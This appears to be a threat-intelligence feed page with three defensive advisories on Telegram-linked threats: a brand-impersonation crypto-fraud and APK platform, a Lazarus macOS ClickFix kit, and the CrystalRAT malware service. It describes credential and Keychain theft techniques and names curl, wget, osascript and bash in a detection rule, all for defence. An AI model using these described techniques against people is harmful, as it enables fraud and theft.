telegram - TrustStrike Labs

threat

2026-05-03

Scammers used Telegram's built-in mini-apps to impersonate Apple, NVIDIA, and Disney for crypto fraud and Android malware - all running on the same backend

CTM360 disclosed a large-scale fraud platform called FEMITBOT that uses Telegram's Mini App feature to host crypto scams, impersonate major brands, and distribute Android malware. The platform impersonates Apple, Coca-Cola, Disney, eBay, IBM, NVIDIA, BBC, and others - all backed by the same shared infrastructure identified by a common API response. The mini-apps display fake balances, countdown timers, and limited-time offers inside Telegram's WebView. Some campaigns push fake Android APKs hosted on the same domain as the API to ensure valid TLS certificates. Meta and TikTok tracking pixels measure conversion rates.

femitbot telegram mini-apps ctm360 crypto-scams android-malware apk-sideload brand-impersonation webview tracking-pixels

Check: Brief staff that any Telegram bot promoting cryptocurrency investments, asking them to deposit funds, or prompting them to install an APK is fraud - regardless of which brand the bot claims to represent.
Affected: Telegram users worldwide who interact with bots claiming to represent major brands. Acute risk for cryptocurrency-curious users targeted by 'investment opportunity' lures, and for Android users sideloading APKs from Telegram-shared links. Organizations whose brand is being impersonated face customer-trust damage even though the breach is in user behavior, not company systems.
Fix: Block sideloading of APKs on managed Android devices and require Google Play Protect to remain enabled. For brand protection teams: monitor Telegram for bots using your company name and report via Telegram's official channels - though the platform's Mini App vetting is essentially nonexistent so reactive moderation is the only path. Treat any 'official' Telegram bot as unverified by default.

threat

2026-04-24

Lazarus 'Mach-O Man' macOS malware kit hitting fintech and crypto execs through fake Telegram meeting invites and ClickFix terminal commands

ANY.RUN and Dark Reading published research on Mach-O Man, a new macOS malware kit Lazarus is deploying against fintech and crypto executives. The chain begins on Telegram with what looks like a legitimate meeting invite from a known contact, leading to a fake Zoom/Teams/Meet page that displays a fake 'connection issue' and instructs the executive to copy-paste a command into Mac Terminal. That ClickFix command grabs credentials, browser sessions, and Keychain data and exfiltrates over Telegram bot APIs. Lazarus has used the same template across the Drift and KelpDAO compromises, totaling more than $500M stolen in two weeks.

lazarus dprk mach-o-man macos clickfix telegram fintech crypto any-run social-engineering

Check: Brief executive, finance, and treasury staff who use Telegram for business communication this week. The lure is a meeting invite from someone they trust, not a cold approach.
Affected: macOS users in executive, finance, business development, and partner-relations roles - particularly those who use Telegram for business. The technique works because the user runs the command themselves, bypassing most preventive controls including macOS endpoint protection. Mach-O Man is not Lazarus-only; other criminal groups have already adopted the kit.
Fix: Train executives never to copy-paste a 'fix' command into Terminal at a meeting page's request, regardless of how legitimate the invite looks. Log and alert on Terminal launches that fetch and execute remote content via curl, wget, osascript, or bash. Hunt for processes in tight infinite loops with Keychain access. Consider Lockdown Mode for high-risk roles.

threat

2026-04-01

CrystalRAT malware-as-a-service sells remote access, crypto theft, and keylogging on Telegram

Kaspersky researchers uncovered CrystalRAT, a new malware-as-a-service sold via Telegram and promoted on YouTube with a tiered subscription model. Built in Go, it combines remote access via VNC, keylogging, clipboard hijacking for crypto wallet theft, browser credential stealing from Chromium/Yandex/Opera, and data harvesting from Steam, Discord, and Telegram. Each buyer gets a uniquely encrypted build using ChaCha20, making detection harder. Kaspersky warns that new versions are still shipping, and the victim count is likely to grow.

crystalrat maas telegram infostealer crypto-clipper rat

Check: Alert staff about fake software cracks and activators - the most common delivery vector for CrystalRAT infections.
Affected: Windows users who download software from unofficial sources. Current victims are primarily in Russia, but the MaaS model means geographic expansion is expected.
Fix: Block known CrystalRAT C2 infrastructure at the network level. Ensure endpoint detection tools are updated with Kaspersky's published IOCs. Train staff to verify crypto wallet addresses before confirming transfers - clipboard hijacking swaps addresses silently.